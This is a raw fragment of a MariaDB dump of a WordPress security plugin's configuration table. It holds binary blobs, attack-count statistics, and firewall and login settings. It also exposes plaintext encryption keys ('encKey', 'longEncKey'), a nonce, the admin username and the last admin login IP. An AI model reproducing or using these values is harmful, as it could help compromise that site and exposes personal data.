���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v��(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c�� ��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%��!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<����iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[? PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y��}˜.��\Z�^�����*�̶=������.�)~�� �_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*� �&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR���� 𪏨�|�z��03��ܸOV1�SlfwV��1 ��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F !������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s�� b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?�� C�Q���c2 G������e��h��h��^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1631535946;s:3:\"tdf\";a:3:{s:9:\"community\";i:4349;s:7:\"premium\";i:4488;s:9:\"blacklist\";i:44015;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1631448000;s:1:\"c\";i:20994569;}i:1;a:2:{s:1:\"t\";i:1631451600;s:1:\"c\";i:20624690;}i:2;a:2:{s:1:\"t\";i:1631455200;s:1:\"c\";i:18907799;}i:3;a:2:{s:1:\"t\";i:1631458800;s:1:\"c\";i:14090571;}i:4;a:2:{s:1:\"t\";i:1631462400;s:1:\"c\";i:14156890;}i:5;a:2:{s:1:\"t\";i:1631466000;s:1:\"c\";i:14511487;}i:6;a:2:{s:1:\"t\";i:1631469600;s:1:\"c\";i:14406849;}i:7;a:2:{s:1:\"t\";i:1631473200;s:1:\"c\";i:13764985;}i:8;a:2:{s:1:\"t\";i:1631476800;s:1:\"c\";i:13789660;}i:9;a:2:{s:1:\"t\";i:1631480400;s:1:\"c\";i:13426394;}i:10;a:2:{s:1:\"t\";i:1631484000;s:1:\"c\";i:13407139;}i:11;a:2:{s:1:\"t\";i:1631487600;s:1:\"c\";i:12593193;}i:12;a:2:{s:1:\"t\";i:1631491200;s:1:\"c\";i:12933948;}i:13;a:2:{s:1:\"t\";i:1631494800;s:1:\"c\";i:13813461;}i:14;a:2:{s:1:\"t\";i:1631498400;s:1:\"c\";i:13932858;}i:15;a:2:{s:1:\"t\";i:1631502000;s:1:\"c\";i:16170624;}i:16;a:2:{s:1:\"t\";i:1631505600;s:1:\"c\";i:19797508;}i:17;a:2:{s:1:\"t\";i:1631509200;s:1:\"c\";i:18910026;}i:18;a:2:{s:1:\"t\";i:1631512800;s:1:\"c\";i:19007067;}i:19;a:2:{s:1:\"t\";i:1631516400;s:1:\"c\";i:18965270;}i:20;a:2:{s:1:\"t\";i:1631520000;s:1:\"c\";i:18587893;}i:21;a:2:{s:1:\"t\";i:1631523600;s:1:\"c\";i:17144387;}i:22;a:2:{s:1:\"t\";i:1631527200;s:1:\"c\";i:15923855;}i:23;a:2:{s:1:\"t\";i:1631530800;s:1:\"c\";i:15904350;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1630886400;s:1:\"c\";i:467658053;}i:1;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459138337;}i:2;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495757979;}i:3;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433397329;}i:4;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367460903;}i:5;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431800806;}i:6;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429312036;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1628899200;s:1:\"c\";i:402309236;}i:1;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340946360;}i:2;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391300442;}i:3;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:344008362;}i:4;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:280101129;}i:5;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333951459;}i:6;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408472786;}i:7;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385847926;}i:8;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356785199;}i:9;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:377481321;}i:10;a:2:{s:1:\"t\";i:1629763200;s:1:\"c\";i:417693067;}i:11;a:2:{s:1:\"t\";i:1629849600;s:1:\"c\";i:418086694;}i:12;a:2:{s:1:\"t\";i:1629936000;s:1:\"c\";i:389897086;}i:13;a:2:{s:1:\"t\";i:1630022400;s:1:\"c\";i:408710800;}i:14;a:2:{s:1:\"t\";i:1630108800;s:1:\"c\";i:402822033;}i:15;a:2:{s:1:\"t\";i:1630195200;s:1:\"c\";i:469471535;}i:16;a:2:{s:1:\"t\";i:1630281600;s:1:\"c\";i:545439548;}i:17;a:2:{s:1:\"t\";i:1630368000;s:1:\"c\";i:481850155;}i:18;a:2:{s:1:\"t\";i:1630454400;s:1:\"c\";i:467792119;}i:19;a:2:{s:1:\"t\";i:1630540800;s:1:\"c\";i:380886969;}i:20;a:2:{s:1:\"t\";i:1630627200;s:1:\"c\";i:446590488;}i:21;a:2:{s:1:\"t\";i:1630713600;s:1:\"c\";i:523203045;}i:22;a:2:{s:1:\"t\";i:1630800000;s:1:\"c\";i:405486746;}i:23;a:2:{s:1:\"t\";i:1630886400;s:1:\"c\";i:467658053;}i:24;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459138337;}i:25;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495757979;}i:26;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433397329;}i:27;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367460903;}i:28;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431800806;}i:29;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429312036;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1286483118;}i:1;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:378795210;}i:2;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:338317425;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:296698826;}i:4;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:230752454;}i:5;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:223770953;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:193573287;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:176301865;}i:8;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:158873635;}i:9;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:153346531;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"d319606251e020ca2a64d4fddd69366859ca1194b138f41fdeb49ddecaaee614\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1632001982','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','1','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:19:{i:0;a:2:{s:7:\"ignoreC\";s:32:\"6fd0d290b978eab8027e6b79501ac149\";s:7:\"ignoreP\";s:32:\"6fd0d290b978eab8027e6b79501ac149\";}i:1;a:2:{s:7:\"ignoreC\";s:32:\"dbc764d14d936ccaf4516f2bb64e10ef\";s:7:\"ignoreP\";s:32:\"dbc764d14d936ccaf4516f2bb64e10ef\";}i:2;a:2:{s:7:\"ignoreC\";s:32:\"44c9694bf8fafec3d3d15c94a2499d1e\";s:7:\"ignoreP\";s:32:\"bc0e1e98251a9ecbbbfd1638b3a60bff\";}i:3;a:2:{s:7:\"ignoreC\";s:32:\"620c3ffdf68920e27a7834b774547252\";s:7:\"ignoreP\";s:32:\"f0ca8859087c27712491046669d9090e\";}i:4;a:2:{s:7:\"ignoreC\";s:32:\"d11b3440081ddccd55bfdf2cc2a11901\";s:7:\"ignoreP\";s:32:\"6c0d45deb56eb69f4100ab72b98d18a2\";}i:5;a:2:{s:7:\"ignoreC\";s:32:\"a7b1d80a7b7c9a37dd357357f80720d4\";s:7:\"ignoreP\";s:32:\"66fc81b51e18fb67e3ff8b11bd378ebe\";}i:6;a:2:{s:7:\"ignoreC\";s:32:\"483fe8d0dc2f62591bc8c2efc2190bd8\";s:7:\"ignoreP\";s:32:\"54b1379f429ead0b05c5679d25ddfe92\";}i:7;a:2:{s:7:\"ignoreC\";s:32:\"baaf322ae29febdddecae999f621ac77\";s:7:\"ignoreP\";s:32:\"64bac185b3e6cab863ec6f49ca6a61e3\";}i:8;a:2:{s:7:\"ignoreC\";s:32:\"29b1a74ec9c37b0dc88a2011730bd475\";s:7:\"ignoreP\";s:32:\"50be91e691e08931d0b28d4f71e3ab3c\";}i:9;a:2:{s:7:\"ignoreC\";s:32:\"0c35395042ef7f93460483ad14ef8eb0\";s:7:\"ignoreP\";s:32:\"0c35395042ef7f93460483ad14ef8eb0\";}i:10;a:2:{s:7:\"ignoreC\";s:32:\"b28f2c7e9624e4cc522c2de8f569d025\";s:7:\"ignoreP\";s:32:\"b28f2c7e9624e4cc522c2de8f569d025\";}i:11;a:2:{s:7:\"ignoreC\";s:32:\"e2aa4fed6ce5ca5897eb8393ac0256a6\";s:7:\"ignoreP\";s:32:\"42d3b8e466048315341f9bab1a6cf7d1\";}i:12;a:2:{s:7:\"ignoreC\";s:32:\"642f1f89465684214ca76f5aaffd8275\";s:7:\"ignoreP\";s:32:\"cc32ece7a4b5ae4d279934589e2324f4\";}i:13;a:2:{s:7:\"ignoreC\";s:32:\"f7e4d68e3fdadec79766b98c63f6dc37\";s:7:\"ignoreP\";s:32:\"6b8a86c1e0f0d37331a598568303c29f\";}i:14;a:2:{s:7:\"ignoreC\";s:32:\"d3ab2d8a318d39f09b1512309ccbc55f\";s:7:\"ignoreP\";s:32:\"e1ca2e5ea41b5dafe3063c5d1435886c\";}i:15;a:2:{s:7:\"ignoreC\";s:32:\"bc338801168903501aa170ed6f8d33ce\";s:7:\"ignoreP\";s:32:\"bc338801168903501aa170ed6f8d33ce\";}i:16;a:2:{s:7:\"ignoreC\";s:32:\"217a137088a91ced0ccf40da03170b10\";s:7:\"ignoreP\";s:32:\"217a137088a91ced0ccf40da03170b10\";}i:17;a:2:{s:7:\"ignoreC\";s:32:\"f643617981a963b32a87a02e858c5c2a\";s:7:\"ignoreP\";s:32:\"f643617981a963b32a87a02e858c5c2a\";}i:18;a:2:{s:7:\"ignoreC\";s:32:\"1aaeddb80931bc57a3dd1f0326b268d0\";s:7:\"ignoreP\";s:32:\"1aaeddb80931bc57a3dd1f0326b268d0\";}}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','3d92ec57b79ed311','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','a1214acac1b3109ae51eae6349fb045cef4b53346ee65840edbf84fa0fad9677','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Mon 23rd August @ 09:22:58AM\";s:2:\"IP\";s:14:\"185.175.113.72\";}','yes'),('lastAttackDataSendId','2410','yes'),('lastAttackDataSendTime','1631517448.134034','yes'),('lastBlockAggregation','1631507606','yes'),('lastBruteForceDataSendTime','1624552785.227388','yes'),('lastDailyCron','1631537669','yes'),('lastDashboardCheck','1631537669','yes'),('lastEmailHash','1629710579:f79603d931a3d344cb4c724d7ac7ff75','yes'),('lastNotificationID','293','no'),('lastPermissionsTemplateCheck','1631580945','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1631397174','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','d3b2995bc26aeb234271b5137e7e3b583b81aac15f3379b6c4cd16f4b9e1fb8f','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U� ��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��= ��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�: X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;.v����+�$� i�?�s� �+\n�� ؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y ��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r��� |hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq 8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A�� ����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X ���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5 �>� F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р� >\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0�� �s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0� VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_< -��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R �,� 5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L�� �\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k _�\r?~��ʷ̀�#G@�C�w�C\'�_� ��� �YЉ�[�����*�Z�j} �B��CE�T�9*�>*� Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/ t� UM_U�q��n]]M�B�G�k ��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r�� u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(� ����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k �|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q� ��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U �����\r��K�a�����g\r���\0^Yp� ژÁk���\Z��`>^=���E������}A�a�p�[���mሳY����p��y1 ����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g� gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p���� \"\n>�p>�>�� ������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub������� �%Ґ�u}��\\d��aȤc+{{ 2e����q�{q(�F�!N:��i�a�yC�c*�|<q>�q�rq9}��<�^���� 2���Պ���%�Y���[�7�1�3�\Z2����j\"2�B\Z2��)2�������3�D�﹇̯Z�,��x��!a%�g��s�x��,ܾY�!^��o���@��#KjZ�� �R}Cd�U���C���2��h$�g����A��� +N�B�UYH�*Yٽ \\� ����F�m�U�?�U�4�(ІǝE�O�BV��EV7C�Lđ5G� )X��N[��֤#�KA$�Zd�n�n�sd�\"Y���T�l\0��h�$:�]q�q�G6��Ȗ)�ȶ�Ñm)�x�j$��$,Z�$���$$E�����w�7J�$�,$�\r�s�ٹ��|����\"{��!{�u���W {�#{?mF�]@�Sϐ��> ��� )��\")�����\ZER��CR�7\"\"� �#i[� u���$$s�x�и��a�.�pb3�u�E��: ٽ��{��������ȱ��H�6=���!yb��J9y�9Ym����i�E�hrr��\0r&�\n9S�9k�9;�3r��R<�)��EJ�,�s}<R:�7R�>�P���͡���gH�D����8����rI�\\?\Z�<�B.�!W^k#��� �w�*�&�*��:aR�%�NmDj��Gj�n#7:J�Z��H��H�o䦤�َ ��!���QH]�1r/[��{\'r�-����4�#��U\"��5H���)�G{�ȓ�7��{���ޅH�ȳ,K�e�$��1�¿yy�yE�!m�H��8���\Z��e�&Nyk�y��yw�y�ꁴK;���H{m?�8��C����\\��v�=D:_�\"�V|C>��@>�8��B�,[�|)�B���@��.B���|�ь��F~���h� ���ހR�7��-���4{��>z�}���U���@�&; }K�H�3���� �_p�o�������(��\'\nu���: E��ʛ(\Z�Ek�(�tBq�(Y����EŢ�ش��?�ʮOD����B�3�PF/e>c(ې�r#�P��pTs�d5ܨA�<~���P�q*T��/��2��ߠz�P��RT��7�?�F�����٨�Aj-B��CGOG���I�q��:�l�LP�f��Q�C�PB-���]j��5:��\":�7�\"j�\Z@�\\�Va7��{e脕��5�����c�Q�}cщ��>�N�ǡ�uPǙCQ��:�T�g�i�xt����=u)�B]ζ�ӱ2t�z=�x:Ct�ɖ�n���[e;:���Ξzu{ �S��[��뚌�|�.0��z� 